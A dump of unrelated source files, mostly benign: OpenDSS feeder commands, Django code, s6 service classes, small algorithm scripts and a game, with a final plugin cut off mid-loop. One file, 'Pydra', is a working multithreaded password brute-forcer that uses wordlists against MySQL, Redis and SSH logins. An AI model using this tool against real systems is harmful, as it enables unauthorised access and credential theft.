DSSText.Command = "New Line.L82 Phases=3 Bus1=81.1.2.3 Bus2=82.1.2.3 LineCode=6 Length=0.25 units=kft"
DSSText.Command = "New Line.L83 Phases=1 Bus1=81.3 Bus2=84.3 LineCode=11 Length=0.675 units=kft"
DSSText.Command = "New Line.L84 Phases=3 Bus1=82.1.2.3 Bus2=83.1.2.3 LineCode=6 Length=0.25 units=kft"
DSSText.Command = "New Line.L85 Phases=1 Bus1=84.3 Bus2=85.3 LineCode=11 Length=0.475 units=kft"
DSSText.Command = "New Line.L86 Phases=3 Bus1=86.1.2.3 Bus2=87.1.2.3 LineCode=6 Length=0.45 units=kft"
DSSText.Command = "New Line.L87 Phases=1 Bus1=87.1 Bus2=88.1 LineCode=9 Length=0.175 units=kft"
DSSText.Command = "New Line.L88 Phases=3 Bus1=87.1.2.3 Bus2=89.1.2.3 LineCode=6 Length=0.275 units=kft"
DSSText.Command = "New Line.L89 Phases=1 Bus1=89.2 Bus2=90.2 LineCode=10 Length=0.25 units=kft"
DSSText.Command = "New Line.L90 Phases=3 Bus1=89.1.2.3 Bus2=91.1.2.3 LineCode=6 Length=0.225 units=kft"
DSSText.Command = "New Line.L91 Phases=1 Bus1=91.3 Bus2=92.3 LineCode=11 Length=0.3 units=kft"
DSSText.Command = "New Line.L92 Phases=3 Bus1=91.1.2.3 Bus2=93.1.2.3 LineCode=6 Length=0.225 units=kft"
DSSText.Command = "New Line.L93 Phases=1 Bus1=93.1 Bus2=94.1 LineCode=9 Length=0.275 units=kft"
DSSText.Command = "New Line.L94 Phases=3 Bus1=93.1.2.3 Bus2=95.1.2.3 LineCode=6 Length=0.3 units=kft"
DSSText.Command = "New Line.L95 Phases=1 Bus1=95.2 Bus2=96.2 LineCode=10 Length=0.2 units=kft"
DSSText.Command = "New Line.L96 Phases=3 Bus1=97.1.2.3 Bus2=98.1.2.3 LineCode=3 Length=0.275 units=kft"
DSSText.Command = "New Line.L97 Phases=3 Bus1=98.1.2.3 Bus2=99.1.2.3 LineCode=3 Length=0.55 units=kft"
DSSText.Command = "New Line.L98 Phases=3 Bus1=99.1.2.3 Bus2=100.1.2.3 LineCode=3 Length=0.3 units=kft"
DSSText.Command = "New Line.L99 Phases=3 Bus1=100.1.2.3 Bus2=450.1.2.3 LineCode=3 Length=0.8 units=kft"
DSSText.Command = "New Line.L118 Phases=3 Bus1=197.1.2.3 Bus2=101.1.2.3 LineCode=3 Length=0.25 units=kft"
DSSText.Command = "New Line.L100 Phases=1 Bus1=101.3 Bus2=102.3 LineCode=11 Length=0.225 units=kft"
DSSText.Command = "New Line.L101 Phases=3 Bus1=101.1.2.3 Bus2=105.1.2.3 LineCode=3 Length=0.275 units=kft"
DSSText.Command = "New Line.L102 Phases=1 Bus1=102.3 Bus2=103.3 LineCode=11 Length=0.325 units=kft"
DSSText.Command = "New Line.L103 Phases=1 Bus1=103.3 Bus2=104.3 LineCode=11 Length=0.7 units=kft"
DSSText.Command = "New Line.L104 Phases=1 Bus1=105.2 Bus2=106.2 LineCode=10 Length=0.225 units=kft"
DSSText.Command = "New Line.L105 Phases=3 Bus1=105.1.2.3 Bus2=108.1.2.3 LineCode=3 Length=0.325 units=kft"
DSSText.Command = "New Line.L106 Phases=1 Bus1=106.2 Bus2=107.2 LineCode=10 Length=0.575 units=kft"
DSSText.Command = "New Line.L107 Phases=1 Bus1=108.1 Bus2=109.1 LineCode=9 Length=0.45 units=kft"
DSSText.Command = "New Line.L108 Phases=3 Bus1=108.1.2.3 Bus2=300.1.2.3 LineCode=3 Length=1 units=kft"
DSSText.Command = "New Line.L109 Phases=1 Bus1=109.1 Bus2=110.1 LineCode=9 Length=0.3 units=kft"
DSSText.Command = "New Line.L110 Phases=1 Bus1=110.1 Bus2=111.1 LineCode=9 Length=0.575 units=kft"
DSSText.Command = "New Line.L111 Phases=1 Bus1=110.1 Bus2=112.1 LineCode=9 Length=0.125 units=kft"
DSSText.Command = "New Line.L112 Phases=1 Bus1=112.1 Bus2=113.1 LineCode=9 Length=0.525 units=kft"
DSSText.Command = "New Line.L113 Phases=1 Bus1=113.1 Bus2=114.1 LineCode=9 Length=0.325 units=kft"
DSSText.Command = "New Line.L114 Phases=3 Bus1=135.1.2.3 Bus2=35.1.2.3 LineCode=4 Length=0.375 units=kft"
DSSText.Command = "New Line.L116 Phases=3 Bus1=152.1.2.3 Bus2=52.1.2.3 LineCode=1 Length=0.4 units=kft"
DSSText.Command = "New Line.L117 Phases=3 Bus1=160r.1.2.3 Bus2=67.1.2.3 LineCode=6 Length=0.35 units=kft"
#
#
# ! NORMALLY CLOSED SWITCHES ARE DEFINED AS SHORT LINES
# ! Could also be defned by setting the Switch=Yes property
#
DSSText.Command = "New Line.Sw2 phases=3 Bus1=13 Bus2=152 r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
DSSText.Command = "New Line.Sw1 phases=3 Bus1=150r Bus2=149 r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
DSSText.Command = "New Line.Sw3 phases=3 Bus1=18 Bus2=135 r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
DSSText.Command = "New Line.Sw4 phases=3 Bus1=60 Bus2=160 r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
DSSText.Command = "New Line.Sw5 phases=3 Bus1=97 Bus2=197 r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
DSSText.Command = "New Line.Sw6 phases=3 Bus1=61 Bus2=61s r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
#
# ! NORMALLY OPEN SWITCHES; DEFINED AS SHORT LINE TO OPEN BUS SO WE CAN SEE OPEN POINT VOLTAGES.
# ! COULD ALSO BE DEFINED AS DISABLED OR THE TERMINCAL COULD BE OPENED AFTER BEING DEFINED
#
DSSText.Command = "New Line.Sw7 phases=3 Bus1=151 Bus2=300_OPEN r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
DSSText.Command = "New Line.Sw8 phases=1 Bus1=54.1 Bus2=94_OPEN.1 r1=1e-3 r0=1e-3 x1=0.000 x0=0.000 c1=0.000 c0=0.000 Length=0.001"
#
# ! LOAD TRANSFORMER AT 61s/610
# ! This is a 150 kVA Delta-Delta stepdown from 4160V to 480V.
#
DSSText.Command = "New Transformer.XFM1 Phases=3 Windings=2 Xhl=2.72"
DSSText.Command = "~ wdg=1 bus=61s conn=Delta kv=4.16 kva=150 %r=0.635"
DSSText.Command = "~ wdg=2 bus=610 conn=Delta kv=0.48 kva=150 %r=0.635"
#
# ! CAPACITORS
# ! Capacitors are 2-terminal devices. The 2nd terminal (Bus2=...) defaults to all phases
# ! connected to ground (Node 0). Thus, it need not be specified if a Y-connected or L-N connected
# ! capacitor is desired
#
DSSText.Command = "New Capacitor.C83 Bus1=83 Phases=3 kVAR=600 kV=4.16"
DSSText.Command = "New Capacitor.C88a Bus1=88.1 Phases=1 kVAR=50 kV=2.402"
DSSText.Command = "New Capacitor.C90b Bus1=90.2 Phases=1 kVAR=50 kV=2.402"
DSSText.Command = "New Capacitor.C92c Bus1=92.3 Phases=1 kVAR=50 kV=2.402"
#
#
# !REGULATORS - REDIRECT TO DEFINITIONS FILE
# ! This file contains definitions for the remainder of regulators on the feeder:
#
DSSText.Command = "Redirect IEEE123Regulators.DSS"
#
# ! SPOT LOADS -- REDIRECT INPUT STREAM TO LOAD DEFINITIONS FILE
#
DSSText.Command = "Redirect IEEE123Loads.DSS"
#
# ! All devices in the test feeder are now defined.
# !
# ! Many of the voltages are reported in per unit, so it is important to establish the base voltages at each bus so
# ! that we can compare with the result with greater ease.
# ! We will let the DSS compute the voltage bases by doing a zero-load power flow.
# ! There are only two voltage bases in the problem: 4160V and 480V. These must be expressed in kV
#
DSSText.Command = "Set VoltageBases = [4.16, 0.48] ! ARRAY OF VOLTAGES IN KV"
DSSText.Command = "CalcVoltageBases ! PERFORMS ZERO LOAD POWER FLOW TO ESTIMATE VOLTAGE BASES"
DSSText.Command = "solve"
DSSText.Command = "Show Voltage LN Nodes"
|
import numpy as np
class pca:
def __init__(self):
print ''
def meanVector(self,vectorLijst):
result = np.zeros(vectorLijst[0].size)
i=0
for vector in vectorLijst:
result = result + vector
i += 1
result = result/i
return result
def covarianceMatrix(self,vectorLijst):
mean = self.meanVector(vectorLijst)
a = len(vectorLijst[0])
b = len(vectorLijst)
D = np.zeros(shape=(a,b))
i=0
for vector in vectorLijst:
D[:,i] = vector-mean
i += 1
S = D.dot(np.transpose(D))/i
return S
def covarianceMatrix2(self, vectorLijst):
X = np.zeros(shape=(vectorLijst[0].size,len(vectorLijst)))
for i in range (0,len(vectorLijst)):
X[:,i] = vectorLijst[i]
S = np.cov(X)
return S
def eigenDecomposition(self,vectorLijst):
S = self.covarianceMatrix(vectorLijst)
Eval, Evec = np.linalg.eig(S)
return Eval, Evec
def pca(self,f,vectorLijst):
eigenwaarden,eigenvectoren = self.eigenDecomposition(vectorLijst)
positiveEigenvalues = np.absolute(eigenwaarden)
idx = (-np.array(positiveEigenvalues)).argsort()
eigenValues = positiveEigenvalues[idx]
eigenvectoren = eigenvectoren[:,idx]
evecT = np.transpose(eigenvectoren)
Vt = np.sum(eigenValues)
PT = np.array(evecT[0])
# Eigenvector matrix maken door rij per rij toe te voegen
Sum = eigenValues[0]
t = 1
#print 'Vt = ' +str(Vt)
while Sum < f*Vt:
Sum = Sum + eigenValues[t]
if Sum < f*Vt:
t += 1
PT = np.vstack([PT, evecT[t]])
P = np.transpose(PT)
return P, eigenValues[0:t]
|
# Generated by Django 2.2.7 on 2020-01-26 09:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('statics', '0020_auto_20200126_1444'),
('statics', '0022_reply_deleted'),
]
operations = [
]
|
"""s6 services management.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import abc
import errno
import os
import logging
import six
from treadmill import fs
from .. import _utils
from .. import _service_base
_LOGGER = logging.getLogger(__name__)
class BundleService(_service_base.Service):
"""s6 rc bundle service.
"""
__slots__ = (
'_contents',
)
_TYPE = _service_base.ServiceType.Bundle
def __init__(self, directory, name, contents=None):
super(BundleService, self).__init__(directory, name)
self._contents = contents
@property
def type(self):
return self._TYPE
@property
def _contents_file(self):
return os.path.join(self._dir, 'contents')
@property
def contents(self):
"""Gets the contents of the bundle.
"""
if self._contents is None:
self._contents = _utils.set_list_read(self._contents_file)
return self._contents
def write(self):
"""Write down the service definition.
"""
super(BundleService, self).write()
# Mandatory settings
if not self._contents and not os.path.exists(self._contents_file):
raise ValueError('Invalid Bundle: No content')
elif self._contents is not None:
if not self._contents:
raise ValueError('Invalid Bundle: empty')
_utils.set_list_write(self._contents_file, self._contents)
@six.add_metaclass(abc.ABCMeta)
class _AtomicService(_service_base.Service):
"""Abstract base class for all atomic services (per s6-rc definition).
"""
__slots__ = (
'_dependencies',
'_timeout_up',
'_timeout_down',
'_env',
)
def __init__(self, directory, name,
timeout_up=None, timeout_down=None,
dependencies=None, environ=None):
super(_AtomicService, self).__init__(directory, name)
self._dependencies = dependencies
self._timeout_up = timeout_up
self._timeout_down = timeout_down
self._env = environ
@property
def data_dir(self):
"""Returns the data directory for the services.
:returns ``str``:
Full path to the service data directory.
"""
return os.path.join(self._dir, 'data')
@property
def env_dir(self):
"""Returns the environ directory for the services.
:returns ``str``:
Full path to the service environ directory.
"""
return os.path.join(self._dir, 'env')
@property
def environ(self):
"""Returns the environ dictionary for the services.
:returns ``dict``:
Service environ dictionary.
"""
if self._env is None:
self._env = _utils.environ_dir_read(self.env_dir)
return self._env
@environ.setter
def environ(self, new_environ):
self._env = new_environ
@property
def _dependencies_file(self):
return os.path.join(self._dir, 'dependencies')
@property
def dependencies(self):
"""Returns the dependencies set for the services.
:returns ``set``:
Service dependencies set.
"""
if self._dependencies is None:
self._dependencies = _utils.set_list_read(self._dependencies_file)
return self._dependencies
@dependencies.setter
def dependencies(self, new_deps):
self._dependencies = set(new_deps)
@property
def timeout_up(self):
"""Returns amount of milliseconds to wait for the service to come up.
:returns ``int``:
Amount of milliseconds to wait. 0 means infinitely.
"""
if self._timeout_up is None:
self._timeout_up = _utils.value_read(
os.path.join(self._dir, 'timeout-up'),
default=0
)
return self._timeout_up
@property
def timeout_down(self):
"""Returns amount of milliseconds to wait for the service to come down.
:returns ``int``:
Amount of milliseconds to wait. 0 means infinitely.
"""
if self._timeout_down is None:
self._timeout_down = _utils.value_read(
os.path.join(self._dir, 'timeout-down'),
default=0
)
return self._timeout_down
@abc.abstractmethod
def write(self):
"""Write down the service definition.
"""
super(_AtomicService, self).write()
# We only write dependencies/environ if we have new ones.
fs.mkdir_safe(self.env_dir)
fs.mkdir_safe(self.data_dir)
if self._dependencies is not None:
_utils.set_list_write(self._dependencies_file, self._dependencies)
if self._env is not None:
_utils.environ_dir_write(self.env_dir, self._env)
if self._timeout_up is not None:
_utils.value_write(
os.path.join(self._dir, 'timeout-up'),
self._timeout_up
)
if self._timeout_down is not None:
_utils.value_write(
os.path.join(self._dir, 'timeout-down'),
self._timeout_down
)
class LongrunService(_AtomicService):
"""s6 long running service.
"""
__slots__ = (
'_consumer_for',
'_default_down',
'_finish_script',
'_log_run_script',
'_notification_fd',
'_pipeline_name',
'_producer_for',
'_run_script',
'_timeout_finish',
)
_TYPE = _service_base.ServiceType.LongRun
def __init__(self, directory, name,
run_script=None, finish_script=None, notification_fd=None,
log_run_script=None, timeout_finish=None, default_down=None,
pipeline_name=None, producer_for=None, consumer_for=None,
dependencies=None, environ=None):
super(LongrunService, self).__init__(
directory,
name,
dependencies=dependencies,
environ=environ
)
if producer_for and log_run_script:
raise ValueError('Invalid LongRun service options: producer/log')
self._consumer_for = consumer_for
self._default_down = default_down
self._finish_script = finish_script
self._log_run_script = log_run_script
self._notification_fd = notification_fd
self._pipeline_name = pipeline_name
self._producer_for = producer_for
self._run_script = run_script
self._timeout_finish = timeout_finish
@property
def type(self):
return self._TYPE
@property
def logger_dir(self):
"""Returns the logger directory for the services.
:returns ``str``:
Full path to the service log directory.
"""
return os.path.join(self._dir, 'log')
@property
def notification_fd(self):
"""s6 "really up" notification fd.
"""
if self._notification_fd is None:
self._notification_fd = _utils.value_read(
os.path.join(self._dir, 'notification-fd'),
default=-1
)
return self._notification_fd
@notification_fd.setter
def notification_fd(self, new_notification_fd):
self._notification_fd = new_notification_fd
@property
def default_down(self):
"""Is the default service state set to down?
"""
if self._default_down is None:
self._default_down = os.path.exists(
os.path.join(self._dir, 'down')
)
return self._default_down
@default_down.setter
def default_down(self, default_down):
self._default_down = bool(default_down)
@property
def _run_file(self):
return os.path.join(self._dir, 'run')
@property
def _finish_file(self):
return os.path.join(self._dir, 'finish')
@property
def _log_run_file(self):
return os.path.join(self.logger_dir, 'run')
@property
def run_script(self):
"""Service run script.
"""
if self._run_script is None:
self._run_script = _utils.script_read(self._run_file)
return self._run_script
@run_script.setter
def run_script(self, new_script):
self._run_script = new_script
@property
def finish_script(self):
"""Service finish script.
"""
if self._finish_script is None:
try:
self._finish_script = _utils.script_read(self._finish_file)
except IOError as err:
if err.errno is not errno.ENOENT:
raise
return self._finish_script
@finish_script.setter
def finish_script(self, new_script):
self._finish_script = new_script
@property
def log_run_script(self):
"""Service log run script.
"""
if self._log_run_script is None:
try:
self._log_run_script = _utils.script_read(self._log_run_file)
except IOError as err:
if err.errno is not errno.ENOENT:
raise
return self._log_run_script
@log_run_script.setter
def log_run_script(self, new_script):
self._log_run_script = new_script
@property
def timeout_finish(self):
"""Returns amount of milliseconds to wait for the finish script to
complete.
:returns ``int``:
Amount of milliseconds to wait. 0 means infinitely. Default 5000.
"""
if self._timeout_finish is None:
self._timeout_finish = _utils.value_read(
os.path.join(self._dir, 'timeout-finish'),
default=5000
)
return self._timeout_finish
@timeout_finish.setter
def timeout_finish(self, timeout_finish):
"""Service finish script timeout.
"""
if timeout_finish is not None:
if isinstance(timeout_finish, six.integer_types):
self._timeout_finish = timeout_finish
else:
self._timeout_finish = int(timeout_finish, 10)
@property
def _pipeline_name_file(self):
return os.path.join(self._dir, 'pipeline-name')
@property
def pipeline_name(self):
"""Gets the name of the pipeline.
"""
if self._pipeline_name is None:
self._pipeline_name = _utils.data_read(self._pipeline_name_file)
return self._pipeline_name
@pipeline_name.setter
def pipeline_name(self, new_name):
self._pipeline_name = new_name
@property
def _producer_for_file(self):
return os.path.join(self._dir, 'producer-for')
@property
def producer_for(self):
"""Gets which services this service is a producer for.
"""
if self._producer_for is None:
self._producer_for = _utils.data_read(self._producer_for_file)
return self._producer_for
@producer_for.setter
def producer_for(self, new_name):
"""Sets the producer for another service.
"""
self._producer_for = new_name
@property
def _consumer_for_file(self):
return os.path.join(self._dir, 'consumer-for')
@property
def consumer_for(self):
"""Gets which services this service is a consumer for.
"""
if self._consumer_for is None:
self._consumer_for = _utils.data_read(self._consumer_for_file)
return self._consumer_for
@consumer_for.setter
def consumer_for(self, new_name):
"""Sets which services this service is a consumer for.
"""
self._consumer_for = new_name
def write(self):
"""Write down the service definition.
"""
# Disable R0912: Too many branche
# pylint: disable=R0912
super(LongrunService, self).write()
# Mandatory settings
if self._run_script is None and not os.path.exists(self._run_file):
raise ValueError('Invalid LongRun service: not run script')
elif self._run_script is not None:
_utils.script_write(self._run_file, self._run_script)
# Handle the case where the run script is a generator
if not isinstance(self._run_script, six.string_types):
self._run_script = None
# Optional settings
if self._finish_script is not None:
_utils.script_write(self._finish_file, self._finish_script)
# Handle the case where the finish script is a generator
if not isinstance(self._finish_script, six.string_types):
self._finish_script = None
if self._log_run_script is not None:
# Create the log dir on the spot
fs.mkdir_safe(os.path.dirname(self._log_run_file))
_utils.script_write(self._log_run_file, self._log_run_script)
# Handle the case where the run script is a generator
if not isinstance(self._log_run_script, six.string_types):
self._log_run_script = None
if self._default_down:
_utils.data_write(
os.path.join(self._dir, 'down'),
None
)
else:
fs.rm_safe(os.path.join(self._dir, 'down'))
if self._timeout_finish is not None:
_utils.value_write(
os.path.join(self._dir, 'timeout-finish'),
self._timeout_finish
)
if self._notification_fd is not None:
_utils.value_write(
os.path.join(self._dir, 'notification-fd'),
self._notification_fd
)
if self._pipeline_name is not None:
_utils.data_write(self._pipeline_name_file, self._pipeline_name)
if self._producer_for is not None:
_utils.data_write(self._producer_for_file, self._producer_for)
if self._consumer_for is not None:
_utils.data_write(self._consumer_for_file, self._consumer_for)
class OneshotService(_AtomicService):
"""Represents a s6 rc one-shot service which is only ever executed once.
"""
__slots__ = (
'_up',
'_down',
)
# XXX timeout-up/timeout-down
_TYPE = _service_base.ServiceType.Oneshot
def __init__(self, directory, name=None,
up_script=None, down_script=None,
dependencies=None, environ=None):
super(OneshotService, self).__init__(
directory,
name,
dependencies=dependencies,
environ=environ
)
self._up = up_script
self._down = down_script
@property
def type(self):
return self._TYPE
@property
def _up_file(self):
return os.path.join(self._dir, 'up')
@property
def _down_file(self):
return os.path.join(self._dir, 'down')
@property
def up(self):
"""Gets the one shot service up file.
"""
if self._up is None:
self._up = _utils.script_read(self._up_file)
return self._up
@up.setter
def up(self, new_script):
"""Sets the one-shot service up file.
"""
self._up = new_script
@property
def down(self):
"""Gets the one-shot service down file.
"""
if self._down is None:
self._down = _utils.script_read(self._down_file)
return self._down
@down.setter
def down(self, new_script):
"""Sets the one-shot service down file.
"""
self._down = new_script
def write(self):
"""Write down the service definition.
"""
super(OneshotService, self).write()
# Mandatory settings
if not self._up and not os.path.exists(self._up_file):
raise ValueError('Invalid Oneshot service: not up script')
elif self._up is not None:
_utils.script_write(self._up_file, self._up)
if not isinstance(self._up_file, six.string_types):
self._up_file = None
# Optional settings
if self._down is not None:
_utils.script_write(self._down_file, self._down)
if not isinstance(self._down_file, six.string_types):
self._down_file = None
def create_service(svc_basedir, svc_name, svc_type, **kwargs):
"""Factory function instantiating a new service object from parameters.
:param ``str`` svc_basedir:
Base directory where to create the service.
:param ``str`` svc_name:
Name of the new service.
:param ``_service_base.ServiceType`` svc_type:
Type for the new service.
:param ``dict`` kw_args:
Additional argument passed to the constructor of the new service.
:returns ``Service``:
New instance of the service
"""
cls = {
_service_base.ServiceType.Bundle: BundleService,
_service_base.ServiceType.LongRun: LongrunService,
_service_base.ServiceType.Oneshot: OneshotService,
}.get(svc_type, None)
if cls is None:
_LOGGER.critical('No implementation for service type %r', svc_type)
cls = LongrunService
return cls(svc_basedir, svc_name, **kwargs)
__all__ = (
'BundleService',
'LongrunService',
'OneshotService',
'create_service',
)
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index),
url(f'^treasurehunt$', views.find_Thunt),
url(f'^treasurehunt/add$', views.create_Thunt),
url(f'^cluenode/delete$', views.delete_node),
url(f'^cluenode/add', views.create_node),
]
|
# read through file one line at a time
def clean_word(word):
return word.strip().lower()
def get_vowel_in_word(words):
vowel = "aeiou"
vowel_in_word = ''
for char in words:
if char in vowel:
vowel_in_word += char
return vowel_in_word
# main program
# def main():
file_obj = open("dictionary.txt", "r")
word = ""
vowel_word = ""
vowels = "aeiou"
for line in file_obj:
word = clean_word(line)
if len(word) <= 6:
continue
vowel_word = get_vowel_in_word(word)
if vowel_word == vowels:
print(word)
|
from django import forms
class unknownWordForm(forms.Form):
unknownWord = forms.CharField(label='')
class studentZipcode(forms.Form):
zip_code = forms.CharField(label='')
|
class Player:
""" Base class of a cuatro player """
def __init__(self, name):
self.name = name
# the color is assigned by the Game, when the player is added.
self.color = None
def play(self, *args):
print "not implemented"
return []
def place(self, *args):
print "not implemented"
class Human(Player):
""" A console-based human player. """
def __init__(self, name="Human"):
Player.__init__(self, name)
def play(self, dice, board):
print board
print dice.throws, "\t", dice
keep = raw_input("which numbers do you want to keep? ")
return [int(k) for k in keep if k.isdigit()]
def place(self, dice, board):
print board
print dice
place = ""
while len(place) != 2:
place = raw_input("where to place your piece? ").upper()
return place
class GoForYahtzee(Player):
weights = {
"Yahtzee": 200,
"Full House": 90,
"Straight": 90,
"4-of-a-kind": 80,
"3-of-a-kind": 40,
"Ones": 5,
"Twos": 5,
"Threes": 5,
"Fours": 5,
"Fives": 5,
"Sixes": 5
}
def __init__(self, name="GoForYahtzeeBot"):
Player.__init__(self, name)
def play(self, dice, board):
maximum = max(dice.counts, key=dice.counts.get)
max_count = dice.counts[maximum]
keep = [maximum] * max_count
print self.name, dice, keep
return keep
def place(self, dice, board):
# score each field ==> take highest
candidates = []
for field in board.fields():
if field.fits(dice):
score = self.weights[field.name] * (1 + field.height * 0.2)
candidates.append((score, field.position))
pos = None if len(candidates) == 0 else max(candidates)[1]
return pos
|
from base.utils import get_model_object
from challenges.models import Challenge
from .models import ChallengeHost, ChallengeHostTeam
def get_challenge_host_teams_for_user(user):
"""Returns challenge host team ids for a particular user"""
return ChallengeHost.objects.filter(user=user).values_list('team_name', flat=True)
def is_user_a_host_of_challenge(user, challenge_pk):
"""Returns boolean if the user is host of a challenge."""
challenge_host_teams = get_challenge_host_teams_for_user(user)
return Challenge.objects.filter(pk=challenge_pk, creator_id__in=challenge_host_teams).exists()
def is_user_part_of_host_team(user, host_team):
"""Returns boolean if the user belongs to the host team or not"""
return ChallengeHost.objects.filter(user=user, team_name=host_team).exists()
get_challenge_host_team_model = get_model_object(ChallengeHostTeam)
|
"""degree of anarray, return the shortest length of the subarrray has same degree with input array."""
from collections import defaultdict
def degree_array(nums):
records = defaultdict(list)
degree = len(nums) # largest degree is all numbers are same
result = 0
for i, n in enumerate(nums):
if n not in records:
records[n].append(i) # record the start index of element
records[n].append(1) # record the frequency
records[n][-1] += 1
if degree < records[n][-1]:
degree = records[n][-1]
result = i - records[n][0] +1 # found a new degree update degree and the length of degree_array
if degree == records[n][-1]:
result = min(result, i-records[n][0]+1) # more than one degree elements choose the shortest
return result
degree_array([1,2,2,3,1,4,2])
|
#!/usr/bin/python3
# 2020-03-17
# [✅] mysql登录爆破
# 增加mysql超时重连
# 读取数量修改为线程数100倍
# 2020-03-18
# [❌] 增加Windows Powershell登录爆破 [!] 待完善
# 2020-03-19
# [❌] 增加mssql爆破 [!] 待完善
# [✅] redis爆破
import time
import optparse
import queue
import threading
import pymysql
import redis
from pexpect import pxssh # ssh
class Pydra:
def __init__(self, options):
self.ctype = options.ctype
self.host = options.host
if options.port is None:
if self.ctype == "mysql":
self.port = 3306
elif self.ctype == "redis":
self.port = 6379
elif self.ctype == "ssh":
self.port = 22
# [!] 未完待续
else:
self.port = options.port
self.ufile = options.userfile
self.pfile = options.passfile
self.thread = options.thread
self.timeout = options.timeout
self.verbose = options.verbose
self.threshold = 100 * self.thread
self.queue = queue.Queue()
self.success = False
self.result = dict()
self.st = time.time()
def read_user(self):
# 读取.txt文档
if ".txt" in self.ufile:
with open(self.ufile, 'r', encoding='utf-8') as uf:
for user in uf.readlines():
self.read_pass(user.strip()) # 当前user遍历整个pass
# 使用用户名
else:
self.read_pass(self.ufile)
def read_pass(self, user):
# 读取密码字典.txt
if ".txt" in self.pfile:
with open(self.pfile, 'r', encoding='utf-8') as pf:
for pwd in pf.readlines():
pwd = pwd.strip()
# 在阈值内,密码入队列
if self.queue.qsize() < self.threshold:
# print("Put into list: " + user + " " + pwd)
self.queue.put(user + "\t" + pwd)
# 队列满,多线程爆破
else:
self.thread_brute()
# 处理多余部分
self.thread_brute()
# 传入参数为单密码
else:
# 调用爆破工具
if self.ctype == "mysql":
self.brute_mysql(user, self.pfile)
elif self.ctype == "redis":
self.brute_redis(self.pfile)
elif self.ctype == "ssh":
self.brute_ssh(user, self.pfile)
def thread_brute(self):
if not self.success: # 未尝试成功
threads = list() # 子线程列表
for n in range(self.thread):
t = threading.Thread(target=self.brute, ) # 创建线程
t.setDaemon(True)
t.start() # 启动线程
threads.append(t)
for t in threads:
t.join() # 等待子进程结束
else: # 成功时终止程序
return
def brute(self):
while not self.queue.empty() and not self.success:
user, pwd = self.queue.get().split("\t")
# 调用爆破工具
if self.ctype == "mysql":
self.brute_mysql(user, pwd)
elif self.ctype == "redis":
self.brute_redis(pwd)
elif self.ctype == "ssh":
self.brute_ssh(user, pwd)
def brute_mysql(self, user, pwd):
try:
if self.verbose:
print("[-] try mysql connect: ", user, "@", pwd)
pymysql.connect(host=self.host, user=user, password=pwd, port=self.port,
connect_timeout=self.timeout) # 超时设置
self.brute_done(user, pwd)
except Exception as e:
if "timed out" in str(e): # 超时重连
self.brute_mysql(user, pwd)
return
def brute_redis(self, pwd):
try:
if self.verbose:
print("[-] try redis connect:", pwd)
r = redis.StrictRedis(host=self.host, password=pwd, port=self.port, socket_timeout=self.timeout)
if r.ping():
self.brute_done(self.ufile, pwd)
except Exception as e:
# print(e)
return
def brute_ssh(self, user, pwd):
try:
s = pxssh.pxssh()
s.login(self.host, username=user, password=pwd, port=self.port)
self.brute_done(user, pwd)
except Exception as e:
print(e)
s.close()
pass
def brute_done(self, user, pwd):
print("[+] success login by: ", user, "@", pwd)
self.success = True
self.result[user] = pwd
et = time.time()
print("[!] Crack time spend:", et-self.st)
def run(self):
print("[!] Aim host: " + self.host + ", Crack type: " + self.ctype)
self.read_user()
print("[!] Result", self.result)
et = time.time()
print("[!] Total time spend:", et-self.st)
def main():
parser = optparse.OptionParser(usage="python3 %prog [options] arg")
parser.add_option('-T', '--ctype', dest="ctype", default="mysql", help="crack type")
parser.add_option('-H', '--host', dest="host", default="127.0.0.1", help="hostname")
parser.add_option('-P', '--port', type=int, dest="port", help="port")
parser.add_option('-u', '--userfile', dest="userfile", default="root", help="username or userfile")
parser.add_option('-p', '--passfile', dest="passfile", default="root", help="password or passfile")
parser.add_option('-t', '--thread', type=int, dest="thread", default=8, help="thread")
parser.add_option('-o', '--timeout', type=int, dest="timeout", default=1, help="time out")
parser.add_option('-q', '--quiet', action="store_false", default=True, dest="verbose", help="keep quiet")
(options, args) = parser.parse_args()
Pydra(options).run()
if __name__ == "__main__":
main()
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
__version__ = "1.0"
from mtenv.core import MTEnv # noqa: F401
from mtenv.envs.registration import make # noqa: F401
__all__ = ["MTEnv", "make"]
|
from pyUbiForge.misc import mesh
from plugins import BasePlugin
from pyUbiForge.ACU.type_readers.datablock import Reader as DataBlock
from pyUbiForge.ACU.type_readers.entity import Reader as Entity
from pyUbiForge.ACU.type_readers.visual import Reader as Visual
from pyUbiForge.ACU.type_readers.lod_selector import Reader as LODSelector
from pyUbiForge.ACU.type_readers.mesh_instance_data import Reader as MeshInstanceData
from typing import Union, List, Dict
import numpy
import pyUbiForge
import logging
class Plugin(BasePlugin):
plugin_name = 'Export DataBlock'
plugin_level = 4
file_type = 'AC2BBF68'
_options = [
{
"Export Method": 'Wavefront (.obj)',
"LOD": 0
},
{
"Texture Type": 'DirectDraw Surface (.dds)'
}
]
def run(self, file_id: Union[str, int], forge_file_name: str, datafile_id: int, options: Union[List[dict], None] = None):
if options is not None:
self._options = options # should do some validation here
# TODO add select directory option
save_folder = pyUbiForge.CONFIG.get('dumpFolder', 'output')
data = pyUbiForge.temp_files(file_id, forge_file_name, datafile_id)
if data is None:
logging.warning(f"Failed to find file {file_id:016X}")
return
data_block_name = data.file_name
data_block: DataBlock = pyUbiForge.read_file(data.file)
if self._options[0]["Export Method"] == 'Wavefront (.obj)':
obj_handler = mesh.ObjMtl(data_block_name, save_folder)
for data_block_entry_id in data_block.files:
data = pyUbiForge.temp_files(data_block_entry_id)
if data is None:
logging.warning(f"Failed to find file {data_block_entry_id:016X}")
continue
